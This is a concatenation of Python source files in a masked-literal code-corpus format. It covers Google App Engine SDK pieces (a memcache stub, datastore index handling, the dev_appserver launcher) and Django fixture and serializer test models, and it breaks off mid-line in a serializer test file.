total_bytes += len ( entry . value ) <EOL> stats . set_items ( items ) <EOL> stats . set_bytes ( total_bytes ) <EOL> stats . set_oldest_item_age ( self . _gettime ( ) - self . _cache_creation_time ) <EOL> def _Dynamic_GrabTail ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> if request . 
item_count ( ) <= <NUM_LIT:0> : <EOL> return <EOL> namespace = request . name_space ( ) <EOL> if not namespace : <EOL> return <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return <EOL> items = namespace_dict . items ( ) <EOL> items . sort ( None , lambda ( key , entry ) : entry . created_time ) <EOL> item_count = <NUM_LIT:0> <EOL> for ( key , entry ) in items : <EOL> if entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> elif not entry . CheckLocked ( ) : <EOL> del namespace_dict [ key ] <EOL> item = response . add_item ( ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> item_count += <NUM_LIT:1> <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> if item_count == request . item_count ( ) : <EOL> return </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . api import validation <EOL> from google . appengine . api import yaml_errors <EOL> from google . appengine . api import yaml_object <EOL> from google . appengine . datastore import datastore_pb <EOL> from google . appengine . datastore import entity_pb <EOL> class Property ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT:name>' : validation . TYPE_STR , <EOL> '<STR_LIT>' : validation . Options ( ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) , <EOL> default = '<STR_LIT>' ) , <EOL> } <EOL> class Index ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT>' : validation . TYPE_STR , <EOL> '<STR_LIT>' : validation . Type ( bool , default = False ) , <EOL> '<STR_LIT>' : validation . Optional ( validation . Repeated ( Property ) ) , <EOL> } <EOL> class IndexDefinitions ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT>' : validation . Optional ( validation . Repeated ( Index ) ) , <EOL> } <EOL> def ParseIndexDefinitions ( document ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return yaml_object . BuildSingleObject ( IndexDefinitions , document ) <EOL> except yaml_errors . EmptyConfigurationFile : <EOL> return None <EOL> def ParseMultipleIndexDefinitions ( document ) : <EOL> """<STR_LIT>""" <EOL> return yaml_object . BuildObjects ( IndexDefinitions , document ) <EOL> def IndexDefinitionsToKeys ( indexes ) : <EOL> """<STR_LIT>""" <EOL> keyset = set ( ) <EOL> if indexes is not None : <EOL> if indexes . indexes : <EOL> for index in indexes . indexes : <EOL> keyset . add ( IndexToKey ( index ) ) <EOL> return keyset <EOL> def IndexToKey ( index ) : <EOL> """<STR_LIT>""" <EOL> props = [ ] <EOL> if index . properties is not None : <EOL> for prop in index . properties : <EOL> if prop . 
direction == '<STR_LIT>' : <EOL> direction = ASCENDING <EOL> else : <EOL> direction = DESCENDING <EOL> props . append ( ( prop . name , direction ) ) <EOL> return index . kind , index . ancestor , tuple ( props ) <EOL> ASCENDING = datastore_pb . Query_Order . ASCENDING <EOL> DESCENDING = datastore_pb . Query_Order . DESCENDING <EOL> EQUALITY_OPERATORS = set ( ( datastore_pb . Query_Filter . EQUAL , <EOL> ) ) <EOL> INEQUALITY_OPERATORS = set ( ( datastore_pb . Query_Filter . LESS_THAN , <EOL> datastore_pb . Query_Filter . LESS_THAN_OR_EQUAL , <EOL> datastore_pb . Query_Filter . GREATER_THAN , <EOL> datastore_pb . Query_Filter . GREATER_THAN_OR_EQUAL , <EOL> ) ) <EOL> EXISTS_OPERATORS = set ( ( datastore_pb . Query_Filter . EXISTS , <EOL> ) ) <EOL> _DIRECTION_MAP = { <EOL> '<STR_LIT>' : entity_pb . Index_Property . ASCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . ASCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . DESCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . DESCENDING , <EOL> } <EOL> def Normalize ( filters , orders ) : <EOL> """<STR_LIT>""" <EOL> for f in filters : <EOL> if f . op ( ) == datastore_pb . Query_Filter . IN and f . property_size ( ) == <NUM_LIT:1> : <EOL> f . set_op ( datastore_pb . Query_Filter . EQUAL ) ; <EOL> eq_properties = set ( [ f . property ( <NUM_LIT:0> ) . name ( ) for f in filters if f . op ( ) == datastore_pb . Query_Filter . EQUAL ] ) ; <EOL> remove_set = eq_properties . copy ( ) <EOL> new_orders = [ ] <EOL> for o in orders : <EOL> if o . property ( ) not in remove_set : <EOL> remove_set . add ( o . property ( ) ) <EOL> new_orders . append ( o ) <EOL> orders = new_orders <EOL> if datastore_types . _KEY_SPECIAL_PROPERTY in eq_properties : <EOL> orders = [ ] <EOL> new_orders = [ ] <EOL> for o in orders : <EOL> if o . property ( ) == datastore_types . _KEY_SPECIAL_PROPERTY : <EOL> new_orders . append ( o ) <EOL> break <EOL> new_orders . 
append ( o ) <EOL> orders = new_orders <EOL> return ( filters , orders ) <EOL> def RemoveNativelySupportedComponents ( filters , orders ) : <EOL> """<STR_LIT>""" <EOL> ( filters , orders ) = Normalize ( filters , orders ) <EOL> has_key_desc_order = False <EOL> if orders and orders [ - <NUM_LIT:1> ] . property ( ) == datastore_types . _KEY_SPECIAL_PROPERTY : <EOL> if orders [ - <NUM_LIT:1> ] . direction ( ) == ASCENDING : <EOL> orders = orders [ : - <NUM_LIT:1> ] <EOL> else : <EOL> has_key_desc_order = True <EOL> if not has_key_desc_order : <EOL> for f in filters : <EOL> if ( f . op ( ) in INEQUALITY_OPERATORS and <EOL> f . property ( <NUM_LIT:0> ) . name ( ) != datastore_types . _KEY_SPECIAL_PROPERTY ) : <EOL> break <EOL> else : <EOL> filters = [ f for f in filters <EOL> if f . property ( <NUM_LIT:0> ) . name ( ) != datastore_types . _KEY_SPECIAL_PROPERTY ] <EOL> return ( filters , orders ) <EOL> def CompositeIndexForQuery ( query ) : <EOL> """<STR_LIT>""" <EOL> required = True <EOL> kind = query . kind ( ) <EOL> ancestor = query . has_ancestor ( ) <EOL> filters = query . filter_list ( ) <EOL> orders = query . order_list ( ) <EOL> for filter in filters : <EOL> assert filter . op ( ) != datastore_pb . Query_Filter . IN , '<STR_LIT>' <EOL> nprops = len ( filter . property_list ( ) ) <EOL> assert nprops == <NUM_LIT:1> , '<STR_LIT>' % nprops <EOL> if not kind : <EOL> required = False <EOL> ( filters , orders ) = RemoveNativelySupportedComponents ( filters , orders ) <EOL> eq_filters = [ f for f in filters if f . op ( ) in EQUALITY_OPERATORS ] <EOL> ineq_filters = [ f for f in filters if f . op ( ) in INEQUALITY_OPERATORS ] <EOL> exists_filters = [ f for f in filters if f . op ( ) in EXISTS_OPERATORS ] <EOL> assert ( len ( eq_filters ) + len ( ineq_filters ) + <EOL> len ( exists_filters ) ) == len ( filters ) , '<STR_LIT>' <EOL> if ( kind and not ineq_filters and not exists_filters and <EOL> not orders ) : <EOL> names = set ( f . property ( <NUM_LIT:0> ) . 
name ( ) for f in eq_filters ) <EOL> if not names . intersection ( datastore_types . _SPECIAL_PROPERTIES ) : <EOL> required = False <EOL> ineq_property = None <EOL> if ineq_filters : <EOL> ineq_property = ineq_filters [ <NUM_LIT:0> ] . property ( <NUM_LIT:0> ) . name ( ) <EOL> for filter in ineq_filters : <EOL> assert filter . property ( <NUM_LIT:0> ) . name ( ) == ineq_property <EOL> props = [ ] <EOL> for f in eq_filters : <EOL> prop = f . property ( <NUM_LIT:0> ) <EOL> props . append ( ( prop . name ( ) , ASCENDING ) ) <EOL> props . sort ( ) <EOL> if ineq_property : <EOL> if orders : <EOL> assert ineq_property == orders [ <NUM_LIT:0> ] . property ( ) <EOL> else : <EOL> props . append ( ( ineq_property , ASCENDING ) ) <EOL> for order in orders : <EOL> props . append ( ( order . property ( ) , order . direction ( ) ) ) <EOL> for filter in exists_filters : <EOL> prop = filter . property ( <NUM_LIT:0> ) <EOL> prop_name = prop . name ( ) <EOL> for name , direction in props : <EOL> if name == prop_name : <EOL> break <EOL> else : <EOL> props . append ( ( prop_name , ASCENDING ) ) <EOL> if kind and not ancestor and len ( props ) <= <NUM_LIT:1> : <EOL> required = False <EOL> if props : <EOL> prop , dir = props [ <NUM_LIT:0> ] <EOL> if prop in datastore_types . _SPECIAL_PROPERTIES and dir is DESCENDING : <EOL> required = True <EOL> unique_names = set ( name for name , dir in props ) <EOL> if len ( props ) > <NUM_LIT:1> and len ( unique_names ) == <NUM_LIT:1> : <EOL> required = False <EOL> return ( required , kind , ancestor , tuple ( props ) , len ( eq_filters ) ) <EOL> def IndexYamlForQuery ( kind , ancestor , props ) : <EOL> """<STR_LIT>""" <EOL> yaml = [ ] <EOL> yaml . append ( '<STR_LIT>' % kind ) <EOL> if ancestor : <EOL> yaml . append ( '<STR_LIT>' ) <EOL> if props : <EOL> yaml . append ( '<STR_LIT>' ) <EOL> for name , direction in props : <EOL> yaml . append ( '<STR_LIT>' % name ) <EOL> if direction == DESCENDING : <EOL> yaml . 
append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:\n>' . join ( yaml ) <EOL> def IndexDefinitionToProto ( app_id , index_definition ) : <EOL> """<STR_LIT>""" <EOL> proto = entity_pb . CompositeIndex ( ) <EOL> proto . set_app_id ( app_id ) <EOL> proto . set_id ( <NUM_LIT:0> ) <EOL> proto . set_state ( entity_pb . CompositeIndex . WRITE_ONLY ) <EOL> definition_proto = proto . mutable_definition ( ) <EOL> definition_proto . set_entity_type ( index_definition . kind ) <EOL> definition_proto . set_ancestor ( index_definition . ancestor ) <EOL> if index_definition . properties is not None : <EOL> for prop in index_definition . properties : <EOL> prop_proto = definition_proto . add_property ( ) <EOL> prop_proto . set_name ( prop . name ) <EOL> prop_proto . set_direction ( _DIRECTION_MAP [ prop . direction ] ) <EOL> return proto <EOL> def IndexDefinitionsToProtos ( app_id , index_definitions ) : <EOL> """<STR_LIT>""" <EOL> return [ IndexDefinitionToProto ( app_id , index ) <EOL> for index in index_definitions ] <EOL> def ProtoToIndexDefinition ( proto ) : <EOL> """<STR_LIT>""" <EOL> properties = [ ] <EOL> proto_index = proto . definition ( ) <EOL> for prop_proto in proto_index . property_list ( ) : <EOL> prop_definition = Property ( name = prop_proto . name ( ) ) <EOL> if prop_proto . direction ( ) == entity_pb . Index_Property . DESCENDING : <EOL> prop_definition . direction = '<STR_LIT>' <EOL> properties . append ( prop_definition ) <EOL> index = Index ( kind = proto_index . entity_type ( ) , properties = properties ) <EOL> if proto_index . ancestor ( ) : <EOL> index . ancestor = True <EOL> return index <EOL> def ProtosToIndexDefinitions ( protos ) : <EOL> """<STR_LIT>""" <EOL> return [ ProtoToIndexDefinition ( definition ) for definition in protos ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> _original_os_urandom = os . urandom <EOL> def os_urandom_replacement ( n ) : <EOL> raise NotImplementedError <EOL> os . urandom = os_urandom_replacement <EOL> import random <EOL> os . urandom = _original_os_urandom <EOL> random . _urandom = _original_os_urandom <EOL> import BaseHTTPServer <EOL> import Bastion <EOL> import CGIHTTPServer <EOL> import ConfigParser <EOL> import Cookie <EOL> import DocXMLRPCServer <EOL> import HTMLParser <EOL> import MimeWriter <EOL> import Queue <EOL> import SimpleHTTPServer <EOL> import SimpleXMLRPCServer <EOL> import SocketServer <EOL> import StringIO <EOL> import UserDict <EOL> import UserList <EOL> import UserString <EOL> import aifc <EOL> import anydbm <EOL> import atexit <EOL> import audiodev <EOL> import base64 <EOL> import bdb <EOL> import binhex <EOL> import bisect <EOL> import bz2 <EOL> import calendar <EOL> import cgi <EOL> import cgitb <EOL> import chunk <EOL> import cmd <EOL> import code <EOL> import codecs <EOL> import codeop <EOL> import colorsys <EOL> import commands <EOL> import cookielib <EOL> import copy <EOL> import copy_reg <EOL> import csv <EOL> import datetime <EOL> import difflib <EOL> import dircache <EOL> import dis <EOL> import doctest <EOL> import dumbdbm <EOL> import filecmp <EOL> import fileinput <EOL> import fnmatch <EOL> import formatter <EOL> import fpformat <EOL> import ftplib <EOL> import getopt <EOL> import getpass <EOL> import gettext <EOL> import glob <EOL> import gzip <EOL> import heapq <EOL> import hmac <EOL> import htmlentitydefs <EOL> import htmllib <EOL> import httplib <EOL> import imaplib <EOL> import imghdr <EOL> import imputil <EOL> import inspect <EOL> import keyword <EOL> import linecache <EOL> import locale <EOL> import logging <EOL> import macpath <EOL> import macurl2path <EOL> import mailbox <EOL> import mailcap <EOL> import markupbase <EOL> import math <EOL> import md5 <EOL> import mhlib <EOL> import mimetools <EOL> import mimetypes <EOL> 
import modulefinder <EOL> import multifile <EOL> import mutex <EOL> import netrc <EOL> import new <EOL> import nntplib <EOL> import ntpath <EOL> import nturl2path <EOL> import opcode <EOL> import optparse <EOL> import os2emxpath <EOL> import pdb <EOL> import pickle <EOL> import pickletools <EOL> import pipes <EOL> import pkgutil <EOL> import popen2 <EOL> import poplib <EOL> import posixpath <EOL> import pprint <EOL> import profile <EOL> import pstats <EOL> import pyclbr <EOL> import pydoc <EOL> import quopri <EOL> import re <EOL> import repr <EOL> import rfc822 <EOL> import robotparser <EOL> import sched <EOL> import sets <EOL> import sgmllib <EOL> import sha <EOL> import shelve <EOL> import shlex <EOL> import shutil <EOL> import site <EOL> import smtplib <EOL> import sndhdr <EOL> import socket <EOL> import stat <EOL> import statvfs <EOL> import string <EOL> import stringold <EOL> import stringprep <EOL> import struct <EOL> import sunau <EOL> import sunaudio <EOL> import symbol <EOL> import sys <EOL> import tabnanny <EOL> import tarfile <EOL> import telnetlib <EOL> import tempfile <EOL> import textwrap <EOL> import time <EOL> import timeit <EOL> import toaiff <EOL> import token <EOL> import tokenize <EOL> import trace <EOL> import traceback <EOL> import types <EOL> import unittest <EOL> import urllib <EOL> import urllib2 <EOL> import urlparse <EOL> import uu <EOL> import uuid <EOL> import warnings <EOL> import wave <EOL> import weakref <EOL> import whichdb <EOL> import xdrlib <EOL> import xml . parsers . expat <EOL> import xml . dom <EOL> import xml . sax <EOL> import xmlrpclib <EOL> import zipfile <EOL> import zlib <EOL> import neo_cs <EOL> import neo_util <EOL> import webob <EOL> import wsgiref . handlers <EOL> from google . appengine . api import datastore <EOL> from google . appengine . api import images <EOL> from google . appengine . api import mail <EOL> from google . appengine . api import memcache <EOL> from google . appengine . 
api import urlfetch <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import bulkload <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import gql <EOL> from google . appengine . ext import search <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . runtime import apiproxy <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
"""<STR_LIT>"""

# NOTE: this module docstring is NOT just documentation — PrintUsageExit()
# renders it with `% render_dict` as the command-line usage text, so its
# contents (and its %-placeholders) are runtime behavior. Do not edit it
# without updating DEFAULT_ARGS accordingly.

# os_compat must be imported before anything that touches the filesystem
# so its platform patches are in effect for the rest of the imports.
from google.appengine.tools import os_compat

import getopt
import logging
import os
import signal
import sys
import traceback
import tempfile

# Configure root logging before the heavyweight SDK imports below so that
# anything they log at import time is formatted consistently.
logging.basicConfig(
    level=logging.INFO,
    format='<STR_LIT>')

from google.appengine.api import yaml_errors
from google.appengine.dist import py_zipimport
from google.appengine.tools import appcfg
from google.appengine.tools import appengine_rpc
from google.appengine.tools import dev_appserver

DEFAULT_ADMIN_CONSOLE_SERVER = '<STR_LIT>'

# Keys of the option dictionary produced by ParseArguments() and consumed
# by main()/dev_appserver.SetupStubs(). (Masked literals are the flag names.)
ARG_ADDRESS = '<STR_LIT:address>'
ARG_ADMIN_CONSOLE_SERVER = '<STR_LIT>'
ARG_ADMIN_CONSOLE_HOST = '<STR_LIT>'
ARG_AUTH_DOMAIN = '<STR_LIT>'
ARG_CLEAR_DATASTORE = '<STR_LIT>'
ARG_BLOBSTORE_PATH = '<STR_LIT>'
ARG_DATASTORE_PATH = '<STR_LIT>'
ARG_DEBUG_IMPORTS = '<STR_LIT>'
ARG_ENABLE_SENDMAIL = '<STR_LIT>'
ARG_SHOW_MAIL_BODY = '<STR_LIT>'
ARG_HISTORY_PATH = '<STR_LIT>'
ARG_LOGIN_URL = '<STR_LIT>'
ARG_LOG_LEVEL = '<STR_LIT>'
ARG_PORT = '<STR_LIT:port>'
ARG_REQUIRE_INDEXES = '<STR_LIT>'
ARG_ALLOW_SKIPPED_FILES = '<STR_LIT>'
ARG_SMTP_HOST = '<STR_LIT>'
ARG_SMTP_PASSWORD = '<STR_LIT>'
ARG_SMTP_PORT = '<STR_LIT>'
ARG_SMTP_USER = '<STR_LIT>'
ARG_STATIC_CACHING = '<STR_LIT>'
ARG_TEMPLATE_DIR = '<STR_LIT>'
ARG_TRUSTED = '<STR_LIT>'

# SDK root: four directory levels up from os_compat.py
# (google/appengine/tools/os_compat.py -> SDK root).
SDK_PATH = os.path.dirname(
    os.path.dirname(
        os.path.dirname(
            os.path.dirname(os_compat.__file__)
        )
    )
)

# Baseline option values; ParseArguments() starts from a copy of this dict
# and overrides entries from the command line.
DEFAULT_ARGS = {
    ARG_PORT: <NUM_LIT>,
    ARG_LOG_LEVEL: logging.INFO,
    ARG_BLOBSTORE_PATH: os.path.join(tempfile.gettempdir(),
                                     '<STR_LIT>'),
    ARG_DATASTORE_PATH: os.path.join(tempfile.gettempdir(),
                                     '<STR_LIT>'),
    ARG_HISTORY_PATH: os.path.join(tempfile.gettempdir(),
                                   '<STR_LIT>'),
    ARG_LOGIN_URL: '<STR_LIT>',
    ARG_CLEAR_DATASTORE: False,
    ARG_REQUIRE_INDEXES: False,
    ARG_TEMPLATE_DIR: os.path.join(SDK_PATH, '<STR_LIT>'),
    ARG_SMTP_HOST: '<STR_LIT>',
    ARG_SMTP_PORT: <NUM_LIT>,
    ARG_SMTP_USER: '<STR_LIT>',
    ARG_SMTP_PASSWORD: '<STR_LIT>',
    ARG_ENABLE_SENDMAIL: False,
    ARG_SHOW_MAIL_BODY: False,
    ARG_AUTH_DOMAIN: '<STR_LIT>',
    ARG_ADDRESS: '<STR_LIT:localhost>',
    ARG_ADMIN_CONSOLE_SERVER: DEFAULT_ADMIN_CONSOLE_SERVER,
    ARG_ADMIN_CONSOLE_HOST: None,
    ARG_ALLOW_SKIPPED_FILES: False,
    ARG_STATIC_CACHING: True,
    ARG_TRUSTED: False,
}


def PrintUsageExit(code):
    """Print the module docstring as a usage message and exit.

    Args:
      code: process exit status to pass to sys.exit().
    """
    render_dict = DEFAULT_ARGS.copy()
    render_dict['<STR_LIT>'] = os.path.basename(sys.argv[<NUM_LIT:0>])
    # The module docstring is a %-format template filled with the defaults.
    print sys.modules['<STR_LIT:__main__>'].__doc__ % render_dict
    sys.stdout.flush()
    sys.exit(code)


def ParseArguments(argv):
    """Parse command-line flags into an option dictionary.

    Args:
      argv: full argument vector including the program name at index 0.

    Returns:
      Tuple (args, option_dict) of positional arguments and the option
      dictionary (a copy of DEFAULT_ARGS with overrides applied).
      Exits via PrintUsageExit() on malformed flags or values.
    """
    option_dict = DEFAULT_ARGS.copy()
    try:
        opts, args = getopt.gnu_getopt(
            argv[<NUM_LIT:1>:],
            '<STR_LIT>',
            ['<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             '<STR_LIT>',
             ])
    except getopt.GetoptError, e:
        print >> sys.stderr, '<STR_LIT>' % e
        PrintUsageExit(<NUM_LIT:1>)

    # NOTE: each flag is tested with an independent `if` (not elif); option
    # strings are masked, so the exact flag<->branch mapping is not visible.
    for option, value in opts:
        if option in ('<STR_LIT>', '<STR_LIT>'):
            PrintUsageExit(<NUM_LIT:0>)
        if option in ('<STR_LIT>', '<STR_LIT>'):
            option_dict[ARG_LOG_LEVEL] = logging.DEBUG
        if option in ('<STR_LIT>', '<STR_LIT>'):
            try:
                option_dict[ARG_PORT] = int(value)
                # Must be a valid TCP port number.
                if not (<NUM_LIT> > option_dict[ARG_PORT] > <NUM_LIT:0>):
                    raise ValueError
            except ValueError:
                print >> sys.stderr, '<STR_LIT>'
                PrintUsageExit(<NUM_LIT:1>)
        if option in ('<STR_LIT>', '<STR_LIT>'):
            option_dict[ARG_ADDRESS] = value
        if option == '<STR_LIT>':
            option_dict[ARG_BLOBSTORE_PATH] = os.path.abspath(value)
        if option == '<STR_LIT>':
            option_dict[ARG_DATASTORE_PATH] = os.path.abspath(value)
        if option == '<STR_LIT>':
            option_dict[ARG_HISTORY_PATH] = os.path.abspath(value)
        if option in ('<STR_LIT:-c>', '<STR_LIT>'):
            option_dict[ARG_CLEAR_DATASTORE] = True
        if option == '<STR_LIT>':
            option_dict[ARG_REQUIRE_INDEXES] = True
        if option == '<STR_LIT>':
            option_dict[ARG_SMTP_HOST] = value
        if option == '<STR_LIT>':
            try:
                option_dict[ARG_SMTP_PORT] = int(value)
                if not (<NUM_LIT> > option_dict[ARG_SMTP_PORT] > <NUM_LIT:0>):
                    raise ValueError
            except ValueError:
                print >> sys.stderr, '<STR_LIT>'
                PrintUsageExit(<NUM_LIT:1>)
        if option == '<STR_LIT>':
            option_dict[ARG_SMTP_USER] = value
        if option == '<STR_LIT>':
            option_dict[ARG_SMTP_PASSWORD] = value
        if option == '<STR_LIT>':
            option_dict[ARG_ENABLE_SENDMAIL] = True
        if option == '<STR_LIT>':
            option_dict[ARG_SHOW_MAIL_BODY] = True
        if option == '<STR_LIT>':
            # Stored under a literal key rather than an ARG_* constant;
            # main() reads it back the same way.
            option_dict['<STR_LIT>'] = value
        if option == '<STR_LIT>':
            option_dict['<STR_LIT>'] = True
        if option == '<STR_LIT>':
            option_dict[ARG_TEMPLATE_DIR] = value
        if option == '<STR_LIT>':
            option_dict[ARG_ADMIN_CONSOLE_SERVER] = value.strip()
        if option == '<STR_LIT>':
            option_dict[ARG_ADMIN_CONSOLE_HOST] = value
        if option == '<STR_LIT>':
            option_dict[ARG_ALLOW_SKIPPED_FILES] = True
        if option == '<STR_LIT>':
            option_dict[ARG_STATIC_CACHING] = False
        if option == '<STR_LIT>':
            option_dict[ARG_TRUSTED] = True
    return args, option_dict


def MakeRpcServer(option_dict):
    """Build an authenticated HttpRpcServer for the admin console host.

    Args:
      option_dict: option dictionary from ParseArguments().

    Returns:
      An appengine_rpc.HttpRpcServer marked as already authenticated
      (credentials callback returns fixed placeholder values).
    """
    server = appengine_rpc.HttpRpcServer(
        option_dict[ARG_ADMIN_CONSOLE_SERVER],
        lambda: ('<STR_LIT>', '<STR_LIT>'),
        appcfg.GetUserAgent(),
        appcfg.GetSourceName(),
        host_override=option_dict[ARG_ADMIN_CONSOLE_HOST])
    server.authenticated = True
    return server


def SigTermHandler(signum, frame):
    """Translate SIGTERM into KeyboardInterrupt so serve_forever() unwinds
    through the same clean-shutdown path as Ctrl-C."""
    raise KeyboardInterrupt()


def main(argv):
    """Run the development application server.

    Args:
      argv: full command-line argument vector.

    Returns:
      Process exit status: 0 on clean shutdown, 1 on any startup or
      serving error (also exits via PrintUsageExit on bad arguments).
    """
    args, option_dict = ParseArguments(argv)

    # Exactly one positional argument: the application root directory.
    if len(args) != <NUM_LIT:1>:
        print >> sys.stderr, '<STR_LIT>'
        PrintUsageExit(<NUM_LIT:1>)

    root_path = args[<NUM_LIT:0>]

    if '<STR_LIT>' in option_dict:
        auth_domain = option_dict['<STR_LIT>']
        dev_appserver.DEFAULT_ENV['<STR_LIT>'] = auth_domain
    if '<STR_LIT>' in option_dict:
        enable_logging = option_dict['<STR_LIT>']
        dev_appserver.HardenedModulesHook.ENABLE_LOGGING = enable_logging

    log_level = option_dict[ARG_LOG_LEVEL]
    port = option_dict[ARG_PORT]
    blobstore_path = option_dict[ARG_BLOBSTORE_PATH]
    datastore_path = option_dict[ARG_DATASTORE_PATH]
    login_url = option_dict[ARG_LOGIN_URL]
    template_dir = option_dict[ARG_TEMPLATE_DIR]
    serve_address = option_dict[ARG_ADDRESS]
    require_indexes = option_dict[ARG_REQUIRE_INDEXES]
    allow_skipped_files = option_dict[ARG_ALLOW_SKIPPED_FILES]
    static_caching = option_dict[ARG_STATIC_CACHING]

    # Canonical app root is forwarded to SetupStubs via the option dict.
    option_dict['<STR_LIT>'] = os.path.realpath(root_path)

    logging.getLogger().setLevel(log_level)

    config = None
    try:
        config, matcher = dev_appserver.LoadAppConfig(root_path, {})
    except yaml_errors.EventListenerError, e:
        logging.error('<STR_LIT>' +
                      str(e))
        return <NUM_LIT:1>
    except dev_appserver.InvalidAppConfigError, e:
        logging.error('<STR_LIT>', e)
        return <NUM_LIT:1>

    # Optional SDK-version check against the admin console server.
    if option_dict[ARG_ADMIN_CONSOLE_SERVER] != '<STR_LIT>':
        server = MakeRpcServer(option_dict)
        update_check = appcfg.UpdateCheck(server, config)
        update_check.CheckSupportedVersion()
        if update_check.AllowedToCheckForUpdates():
            update_check.CheckForUpdates()

    try:
        dev_appserver.SetupStubs(config.application, **option_dict)
    # NOTE(review): bare except deliberately reports *any* stub-setup
    # failure and aborts; a doc-only change cannot narrow it.
    except:
        exc_type, exc_value, exc_traceback = sys.exc_info()
        logging.error(str(exc_type) + '<STR_LIT>' + str(exc_value))
        logging.debug('<STR_LIT>'.join(traceback.format_exception(
            exc_type, exc_value, exc_traceback)))
        return <NUM_LIT:1>

    http_server = dev_appserver.CreateServer(
        root_path,
        login_url,
        port,
        template_dir,
        sdk_dir=SDK_PATH,
        serve_address=serve_address,
        require_indexes=require_indexes,
        allow_skipped_files=allow_skipped_files,
        static_caching=static_caching)

    signal.signal(signal.SIGTERM, SigTermHandler)

    logging.info('<STR_LIT>',
                 config.application, port, serve_address, port)
    try:
        try:
            http_server.serve_forever()
        except KeyboardInterrupt:
            # Ctrl-C or SIGTERM (via SigTermHandler): clean shutdown.
            logging.info('<STR_LIT>')
        except:
            exc_info = sys.exc_info()
            info_string = '<STR_LIT:\n>'.join(traceback.format_exception(*exc_info))
            logging.error('<STR_LIT>', info_string)
            return <NUM_LIT:1>
    finally:
        # Always release the listening socket.
        http_server.server_close()

    return <NUM_LIT:0>


if __name__ == '<STR_LIT:__main__>':
    sys.exit(main(sys.argv))
"""Models and test case used by the fixture-loading regression tests."""
from django.db import models


class Article(models.Model):
    # NOTE(review): `maxlength` is the pre-Django-1.0 spelling of
    # `max_length`; this file targets that era of Django.
    headline = models.CharField(maxlength=<NUM_LIT:100>, default='<STR_LIT>')
    pub_date = models.DateTimeField()

    def __str__(self):
        return self.headline

    class Meta:
        ordering = ('<STR_LIT>', '<STR_LIT>')


# Doctest suite picked up by Django's test runner; the value is executable
# doctest text, not documentation — leave it untouched.
__test__ = {'<STR_LIT>': """<STR_LIT>"""}

from django.test import TestCase


class SampleTestCase(TestCase):
    # Fixture files loaded into the test database before each test method.
    fixtures = ['<STR_LIT>', '<STR_LIT>']

    def testClassFixtures(self):
        "Verify the class-level fixtures were loaded into the database."
        self.assertEqual(Article.objects.count(), <NUM_LIT:4>)
        self.assertEquals(str(Article.objects.all()), "<STR_LIT>")
"""Models exercising the relationships covered by the serializer tests:
foreign key, many-to-many, and one-to-one."""
from django.db import models


class Category(models.Model):
    # NOTE(review): `maxlength` is the pre-Django-1.0 spelling of `max_length`.
    name = models.CharField(maxlength=<NUM_LIT:20>)

    class Meta:
        ordering = ('<STR_LIT:name>',)

    def __str__(self):
        return self.name


class Author(models.Model):
    name = models.CharField(maxlength=<NUM_LIT:20>)

    class Meta:
        ordering = ('<STR_LIT:name>',)

    def __str__(self):
        return self.name


class Article(models.Model):
    # Exercises ForeignKey and ManyToManyField serialization.
    author = models.ForeignKey(Author)
    headline = models.CharField(maxlength=<NUM_LIT:50>)
    pub_date = models.DateTimeField()
    categories = models.ManyToManyField(Category)

    class Meta:
        ordering = ('<STR_LIT>',)

    def __str__(self):
        return self.headline


class AuthorProfile(models.Model):
    # Exercises OneToOneField serialization.
    author = models.OneToOneField(Author)
    date_of_birth = models.DateField()

    def __str__(self):
        return "<STR_LIT>" % self.author


# Doctest suite picked up by Django's test runner; the value is executable
# doctest text, not documentation — leave it untouched.
__test__ = {'<STR_LIT>': """<STR_LIT>"""}
<s> """<STR_LIT>""" <EOL> import unittest , datetime <EOL> from django . utils . functional import curry <EOL> from django . core import serializers <EOL> from django . db import transaction <EOL> from django . core import management <EOL> from models import * <EOL> def data_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . data = data <EOL> instance . save ( ) <EOL> return instance <EOL> def generic_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . data = data [ <NUM_LIT:0> ] <EOL> instance . save ( ) <EOL> for tag in data [ <NUM_LIT:1> : ] : <EOL> instance . tags . create ( data = tag ) <EOL> return instance <EOL> def fk_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> setattr ( instance , '<STR_LIT>' , data ) <EOL> instance . save ( ) <EOL> return instance <EOL> def m2m_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . save ( ) <EOL> instance . data = data <EOL> return instance <EOL> def o2o_create ( pk , klass , data ) : <EOL> instance = klass 